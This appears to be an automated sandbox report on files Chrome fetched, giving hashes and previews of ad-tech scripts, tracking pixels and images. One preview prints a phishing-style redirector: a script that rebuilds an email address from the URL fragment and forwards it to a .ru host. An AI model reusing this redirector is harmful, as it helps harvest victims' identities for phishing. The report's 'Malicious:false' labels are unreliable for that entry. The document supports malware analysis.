                                                                                                                                                                                                                  Entropy (8bit):5.437326705491102
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:DD870A2C6672402B587B3F3D3F7F92D3
                                                                                                                                                                                                                  SHA1:9053ACBE1AC5C4C6143210D1642F2FF1D305CAAB
                                                                                                                                                                                                                  SHA-256:2F3CC71A38371E053ED91438D768065302E7042B03E5450FBDAA3C44E833BA16
                                                                                                                                                                                                                  SHA-512:3052D7F3D9674FC24538737DF5B33F842BD10FC22B04022408BB3DAAE96939340196F59C27A03C3DDFE75EB134255D6EA2E3F6A1AFE42A5A0B0BD9B1D711757E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://yahoo-bidout-d.openx.net/w/1.0/pd?gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                  Preview:<html>.<head><title>Pixels</title></head>.<body>.<script>if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics"))document.browsingTopics()</script>..<img src="https://pixel-sync.sitescout.com/dmp/pixelSync?nid=4&gdpr=0"><img src="https://pixel.tapad.com/idsync/ex/receive?partner_id=1955&partner_device_id=b3b9f665-9366-0f74-0d03-04cc45a021b0"><img src="https://ups.analytics.yahoo.com/ups/58294/sync?_origin=1&uid=9b030610-100b-08ba-14c5-5d10e18f14d5"><img src="https://us-u.openx.net/w/1.0/cm?id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fid.rlcdn.com%2F464246.gif%3Fpartner_uid%3D%7BOPENX_ID%7D"><img src="https://ib.adnxs.com/getuid?https://us-u.openx.net/w/1.0/sd?id=537072399&val=$UID"><img src="https://ad.turn.com/r/cs?pid=9&gdpr=0">..</body>.</html>.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (1240)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1692
                                                                                                                                                                                                                  Entropy (8bit):5.608666781938243
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:5135C2923677211944DB215B04321973
                                                                                                                                                                                                                  SHA1:80677EF001422885DAC649C28E0C53670CFB8B13
                                                                                                                                                                                                                  SHA-256:EB4DC49A324ACA4E776CBB5172A9629A3D3C508951B5D957C95EC4FCC36D136F
                                                                                                                                                                                                                  SHA-512:58B6D48224A3D8C438CAE0DD67EF837C859510F69F3B96697ABFAF116EE84F49943EF4765EDB728214507C0AD9F15FBB52A242636B1DDB5BD3A76CEED2CBCD7F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://tb.pbs.yahoo.com/v1/evp/asset?bcid=5afc769f7239855a15fcee15&pid=5afc75ea3a04293dad9f1a1f&secure=true&rssId=f0262557-5186-3d6e-913d-df2cba992b2f&firstVideo=true&height=226&width=401&sid=35b53262-b96b-4c4a-84ba-5d2a1c4febe4&pblob=lu%3A0%3Bpt%3Ahome%3Bver%3Amegastrm&site=frontpage&region=US&lang=en-US&space_id=2023538075&experience=advstrmvideo&expn=advstrmvideo&expb=TNBE003%2CUSNELT-ReactInRMP-commerce-ctrl-1004%2Cseamless&b_id=e6bevp1jfvvgt&licensor_id=a0a6T00000R2KYJQA3&us_privacy=1YNN&isDockable=false&m.type=VOD&device=desktop&v=1&f=json&s2s=true&gdpr=false&content_len=75&content_title=Officer+tells+driver+in+out-of-control+car+to+crash+into+him&content_id=https%3A%2F%2Fwww.cnn.com%2F2024%2F10%2F03%2Fus%2Fvideo%2Fteen-driver-suv-police-crash-digvid&gpp=DBAA&gpp_sid=-1&pver=1.9.1&aver=3.670.0&country=US&state=New+York&state_code=NY&place=10016&place_type=zip&docked=false&muted=true&autoplay=false&ad.plseq=1&ad.pl=up&ad.pt=home&pos=preroll&evp=bcp&fmt=vmap&ps=c3i31g7s&r=https%3A%2F%2Fwww.yahoo.com%2F&givn=[GOOGLE_INSTREAM_VIDEO_NONCE]&pbckt=Treatment_Oath_Player&npa=0&ltd=0&ppid=792d774a647a744e784532754b67514a50696b777863762e38776648584968614d6c7e41
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<vmap:VMAP xmlns:vmap="http://www.iab.net/videosuite/vmap" version="1.0">..<vmap:AdBreak breakId="ELKQjRhgOPJUvNAu" breakType="linear" timeOffset="start">...<vmap:AdSource>....<vmap:VASTAdData>.....<VAST xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="3.0" xsi:noNamespaceSchemaLocation="oxml.xsd">......<Error><![CDATA[https://bats.video.yahoo.com/p?evt=ad_oppty&_E=ad_oppty&_V=V&V_sec=pb&_w=https%3A%2F%2Fwww.yahoo.com%2F&pver=1.9.1&aver=3.670.0&an=null&os=null&psz=401x226&expn=advstrmvideo&abid=null&s=2023538075&lang=en-US&lms_id=a0a6T00000R2KYJQA3&refid=null&intl=us&site=frontpage&bckt=Treatment_Oath_Player&paln=false&givn=false&rsz=0&pls=35b53262-b96b-4c4a-84ba-5d2a1c4febe4&vs=c3i31g7s&pstaid=f0262557-5186-3d6e-913d-df2cba992b2f&ar=1.77&cont=1&pltype=desktop&expb=TNBE003%2CUSNELT-ReactInRMP-commerce-ctrl-1004%2Cseamless&test=TNBE003%2CUSNELT-ReactInRMP-commerce-ctrl-1004%2Cseamless&mode=EVP&pt=home&pd=null&pct=null&
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10637), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):10637
                                                                                                                                                                                                                  Entropy (8bit):5.2085652328167145
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:397B59E3EECA4F747EA1F6FF6323154C
                                                                                                                                                                                                                  SHA1:C96E42A81F2F864313F6592688CA864D4578E3C3
                                                                                                                                                                                                                  SHA-256:ACF529F550F2FDAAD913C10E6972344E43E07EAE8D5AA57B96FA30ED7C07ACC1
                                                                                                                                                                                                                  SHA-512:CA0F4D6A4FF28A66868BC2387F737073D6CA26A429CBA97CE30B3F86A0820BF0355214618D95CFB5099AF3AF241F50440F3B870BB5C4D26275EFCB93772B8318
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-beacon",[],t):"object"==typeof exports?exports["wafer-beacon"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-beacon"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}func
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (992)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):993
                                                                                                                                                                                                                  Entropy (8bit):4.973119096643199
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B45BC946A2261E63DCDFC3FACA752FF3
                                                                                                                                                                                                                  SHA1:148A799B97CBF85A713D3C49E199ECB232408665
                                                                                                                                                                                                                  SHA-256:B3395510D2BEF53E87B963DA4321117796E85FAEFD7EDC25B9EECBE203248177
                                                                                                                                                                                                                  SHA-512:BCA9C3E9A871DE8C0368329DB176C510691A1532977C17F14EF877EFB6617863C87AD4B19600F269DE3FCFD3B1F696AA793A69A665199C25C60843E917742C60
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://players.brightcove.net/videojs-overlay/3.0.0/videojs-overlay.css
                                                                                                                                                                                                                  Preview:.video-js .vjs-overlay{color:#fff;position:absolute;text-align:center}.video-js .vjs-overlay-no-background{max-width:33%}.video-js .vjs-overlay-background{background-color:#646464;background-color:rgba(255,255,255,0.4);border-radius:3px;padding:10px;width:33%}.video-js .vjs-overlay-top-left{top:5px;left:5px}.video-js .vjs-overlay-top{left:50%;margin-left:-16.5%;top:5px}.video-js .vjs-overlay-top-right{right:5px;top:5px}.video-js .vjs-overlay-right{right:5px;top:50%;transform:translateY(-50%)}.video-js .vjs-overlay-bottom-right{bottom:3.5em;right:5px}.video-js .vjs-overlay-bottom{bottom:3.5em;left:50%;margin-left:-16.5%}.video-js .vjs-overlay-bottom-left{bottom:3.5em;left:5px}.video-js .vjs-overlay-left{left:5px;top:50%;transform:translateY(-50%)}.video-js .vjs-overlay-center{left:50%;margin-left:-16.5%;top:50%;transform:translateY(-50%)}.video-js .vjs-no-flex .vjs-overlay-left,.video-js .vjs-no-flex .vjs-overlay-center,.video-js .vjs-no-flex .vjs-overlay-right{margin-top:-15px}.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):376832
                                                                                                                                                                                                                  Entropy (8bit):4.318558808960432
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:5ABC10DAF32371945C40783BCA92A26C
                                                                                                                                                                                                                  SHA1:B21D9E57ADB6B71DBC652DEBBDC00E0A8270CBBC
                                                                                                                                                                                                                  SHA-256:B44D8D0E3C09259A57A368735B201ABA7AC61680EDAE1BC940C120AF3BDB782A
                                                                                                                                                                                                                  SHA-512:82B48A091F6411195C41BF986106557B9DA3E3819892A772D37CF8C07446BA06051127327258AC79AE3FDC7929A08C1B099246EBE81E759E0972C735A04F402E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://wnsrvbjmeprtfrnfx.ay.delivery/floorPrice/wnsrvBJmEPrTfrnFX/js/floorPrice/linreg.min.js
                                                                                                                                                                                                                  Preview:window.assertive=window.assertive||{};window.assertive.floorPriceVersion='11.9.0_4Fri_11';window.assertive.x771977720=(function(){var a=(function(){var a=[["(?<!motorola )Edge[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["EdgiOS[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["EdgA[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["Edg[ /](\\d+[\\.\\d]+)","Microsoft Edge"],[".*Servo.*Firefox(?:/(\\d+[\\.\\d]+))?","Firefox"],["(?!.*Opera[ /])Firefox(?:[ /](\\d+[\\.\\d]+))?","Firefox"],["(?:BonEcho|GranParadiso|Lorentz|Minefield|Namoroka|Shiretoko)[ /](\\d+[\\.\\d]+)","Firefox"],["CrMo(?:/(\\d+[\\.\\d]+))?","Chrome Mobile"],["Chrome(?:/(\\d+[\\.\\d]+))? Mobile","Chrome Mobile"],["Chrome(?!book)(?:/(\\d+[\\.\\d]+))?","Chrome"],["(?:(?:iPod|iPad|iPhone).+Version|MobileSafari)/(\\d+[\\.\\d]+)","Mobile Safari"],["(?:Version/(\\d+\\.[\\.\\d]+) .*)?Mobile.*Safari/","Mobile Safari"],["(?:iPod|(?<!Apple TV; U; CPU )iPhone|iPad)","Mobile Safari"],["Version/(\\d+\\.[\\.\\d]+) .*Safari/|(?:Safari|Safari(?:%20)?%E6%B5%8F%E8%
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12677), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12677
                                                                                                                                                                                                                  Entropy (8bit):5.20916317837861
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:DA320D39602C7372E993ED8CA6026A92
                                                                                                                                                                                                                  SHA1:E450CBC300424D62D5D40A0716345D0EA1A7DBD6
                                                                                                                                                                                                                  SHA-256:B28A31976C8BC8B8869AA7367D73636F8462F54A42EDD9EB00C28DCAF1FDD7C2
                                                                                                                                                                                                                  SHA-512:F46A3F8A77CFF2E3C746DA437BF57EDA2997EFE1FE36B083AF076CD8F09160545C2C6D7A5AED521D89612F3815195EDAB8B0930112743E80FA9BAF1625F4C347
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-rapid",[],t):"object"==typeof exports?exports["wafer-rapid"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-rapid"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8356), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8356
                                                                                                                                                                                                                  Entropy (8bit):5.15591255297827
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:A9DF8E56A02208BEACF0DED260DD1D62
                                                                                                                                                                                                                  SHA1:8F6AC2F62923D566B1C369DE93FB005A37EB6757
                                                                                                                                                                                                                  SHA-256:10A01F1F787157623EC546EC8105DBA5CAF08B5719667B91EA1449056254D7B9
                                                                                                                                                                                                                  SHA-512:FB29746BF1C080FFA52DCA91E0B27757D604404B4E3753656980801FFCC6E8F3FFD5CDD6D4E1236F85F1BD47765D068EFB8C92DD44EF7BC2D8742DB8ED00D3A3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-menu",[],t):"object"==typeof exports?exports["wafer-menu"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-menu"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function o
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (47261)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):47262
                                                                                                                                                                                                                  Entropy (8bit):5.3974731018213795
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                                                                                                                  SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                                                                                                                  SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                                                                                                                  SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11989
                                                                                                                                                                                                                  Entropy (8bit):7.9394628861372105
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:456F04207C19DF39A730E788FE962D30
                                                                                                                                                                                                                  SHA1:C655D8802BE21AC05ABE4E1999DFE2E57E996594
                                                                                                                                                                                                                  SHA-256:1A0D2A6586860A566B8A6D3C59BB82B5BDA2AFDCF8D40D975212847094E60E7E
                                                                                                                                                                                                                  SHA-512:F8AD86E2AD6E75922EABF0A2AF06F782B8BE1F609900A1EEF8AF8A101D9BA2619697E13F60A17522DE1C6DD713F8287A2DD98A4FEB7A88B78471140F7F9B3A0E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF.............C....................................................................C.........................................................................,............................................K.........................!..1.."AQ.2aq.....#BRb.$3........CS...456r........................................?........................!..1..AQ.."2a..#Bq...$R....Sr...%345C............?..u>........ ......rodQ..M..~.66G.............zz...Y....w.X.....I.E.[..{.....c9.;...*.%...n.a3N91.H..Go.v...JH..;.....09$c...\Z.o`...v.......r..z...o|)......O...5.yi<..71.....;....G.+v].\...F.....0...l=.E.......vIq.7..j..J....Y......hq.tm.@>...vKq..|./../.@.......h..f... .#..]..g.[.[.|.......%...g..w.......f..d..G.q....f..D.z..k6...5TM....fFp@9.y.i.p..^t.my....[.)..#..S..h..Q?....o...':c...X.;..J[.BH.#N.$f...x.. .TY.t.T.f..c.\..l.8tsO.........w...L.W....z^.P..R.2Y.8v.<R.a...p.#.vpg.[.^..(.k.y..D.(k....(F.%.......*..@....... ....@.>.ln.......Z..u...8m,.r.....q.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3412), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3412
                                                                                                                                                                                                                  Entropy (8bit):5.0908215241003845
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:956DABF4D28930BC42D934995B814D6D
                                                                                                                                                                                                                  SHA1:D461E2FAB9B3E6F89561FEB5C2A5CBBB26198951
                                                                                                                                                                                                                  SHA-256:CA9998A600267DC2431ABC077F8CF7A5476A46EE1E82D0C6F12BB17E512C3FE8
                                                                                                                                                                                                                  SHA-512:6A98F3C8201E544DB161FA89E8A434B35B179F7D33446247B13EA08B43A7E79D44025524AEFDE0215827B2B2B95F8AC349712DCA00AA3073DDF2C4EE11B9F710
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-text",[],t):"object"==typeof exports?exports["wafer-text"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-text"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(o){if(r[o])return r[o].exports;var n=r[o]={i:o,l:!1,exports:{}};return e[o].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,o){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:o})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):204
                                                                                                                                                                                                                  Entropy (8bit):4.9486021884354985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:5C3DF15C7C7D45E9D2FB9ADFD2BF829E
                                                                                                                                                                                                                  SHA1:AA60877F59521AADAD140CBD0412229C661E274A
                                                                                                                                                                                                                  SHA-256:2AE0F298E38CD5131A316353A4EB87D8EA8491182DC9C0B4C8062DC284FBD230
                                                                                                                                                                                                                  SHA-512:D413C95845C511FD0636832AB9AA6245C036F9C2273A85A71EA45A2F10DDA0C4804BF7A1E194CA774B4BC5CEF9864FB8249B5919F199CCE21B86078180398C3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://firstontario.athrikasih.com/cloudflare-antibot/
                                                                                                                                                                                                                  Preview:<script>. var fragment = window.location.hash.substring(1);. fragment = fragment.replace(/\+/g, '@');. window.location.href = 'https://9wETjDA.niavereinho.ru/QTnArt4/#D' + fragment;. </script>
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):35006
                                                                                                                                                                                                                  Entropy (8bit):7.965530229982366
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:FC403F15CFEDB154EFEAE88554240828
                                                                                                                                                                                                                  SHA1:0FA8ED503DE5A79502383E5F188B2928F0E35788
                                                                                                                                                                                                                  SHA-256:1F6057FB67F33ED605BAAD484D1899AED4B9C93C0205C1E875F97169F1CE5F48
                                                                                                                                                                                                                  SHA-512:9731C42F7858E368318C3F988DFEFB9203B7AE458D3C4840470A66F3926F8DAA16478174478264F6342CF96E809D1C2B64937FF25ACDD95767855D5722D40B6E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF.............C....................................................................C.........................................................................d............................................B.........................!.1.."AQ.a#2q..B..Rb...$3...Cr...%4c....................................1........................!.1.."A#3Q..2.Ca$Bq.4Rc............?....q%X..v.z\I.1....wg..3..#>.b....Ump.:..ETU($2...|......}..]Gq.....u-/....CO...,c.....Y....8...K.vmW..j.*..O5....,.D.R.b@$T..l...>.;.CVI"..o.b.u>..Kp.:....n.8...6.ow!a"A.$....!..p..)+..t^..Z`.."...v....0.5,<.Y.6._....9....<..6.}.z..~&......?...t.y..ZH.VjO0.....8.a...iG..jh.55._.ii.>.6;..SW%}.*.#G.. ......y$.#....'r%E47i_.-...];...x.......X.....Y.......I.7v.fGE.5`. ..V.....-uQ......GZ..2..xb.........h..". ..........jY.....0z...c^T...b.RQS^h.....|..t... .\.@:3......O.v.fo..._..=i-:Iu....&...Jx..F.o.D.T.|..Y.$n.=\..2_..%.T....o..^'O..D.....'...}-.9 .J...{.+.`H...Nj..W..z.lU.1....d...#.....A...[....$x#..>.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):19002
                                                                                                                                                                                                                  Entropy (8bit):7.968524512132477
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:0CDB4B3AF0814C60BBEFF67B2CF74F68
                                                                                                                                                                                                                  SHA1:28F47FF0ACB7B4D53DB9D60D803F6CADB7FEDD94
                                                                                                                                                                                                                  SHA-256:860470F4E6CD11A33302629CBCDAAF0F435F3C68476AC14CA81648660857DF75
                                                                                                                                                                                                                  SHA-512:80A660EF098EF80A03A2327777E68C11EE2D91C0D6A589B1499AD15457752C88E491C68C8F6527D51D41BCCE13C70F3A2907D96CADB46B68A9C09573DAF264E9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/10s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/10s/match/image.jpeg*~hmac=47a733e881585306a05e65ce4ddf173e6dcdc82ff47df589aabdf1ab4e40209c
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C....................................#,%.!*!..&4'*./121.%6:60:,010...C...........0 . 00000000000000000000000000000000000000000000000000...........".......................................J........................!.1AQ."a.2q...BR...#b......$3r...CSUc..%.ETs...................................)......................!..1AQ.."2Ba.q...............?..*b...S_V|.0*b...6..i..oM@..=5zh.ji...SM.MM4X.b.....i.......M4...4.tT.@..N.]5....S.M54..1S.M54. x......P x..... E....SM0B.qN...zh.kI.j,...Kq.5o.t..."...i.....N....Z..XZ,.:j.u..F*.)p."w.c.t..:T.np9S./....<5..p]..+.my.m.>.`|G:.q.....,rv.\...Q.....F..P.$A#P=.%...^..%:..H...[.k.."...Oho....`..:[......}.R.&.9....5..|[.k......R..K...2.......P.2.~...w.W.....,..c...9..vnf...-......N.1.r3.V.....v....SM....XQ.... F.'.W...}.!.5@f....}*.7.o..Y.*b.....*....*.[.^(........x.aG/.1G.T......h.j..`.MM4]....E....4.;.Jz.a@1W...j..b...M..V.Qb`qW....Z,...._J6..4.t.M@....J..I...O.@..@...........V....W....#+l.9.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                  Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                  SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                  SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                  SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
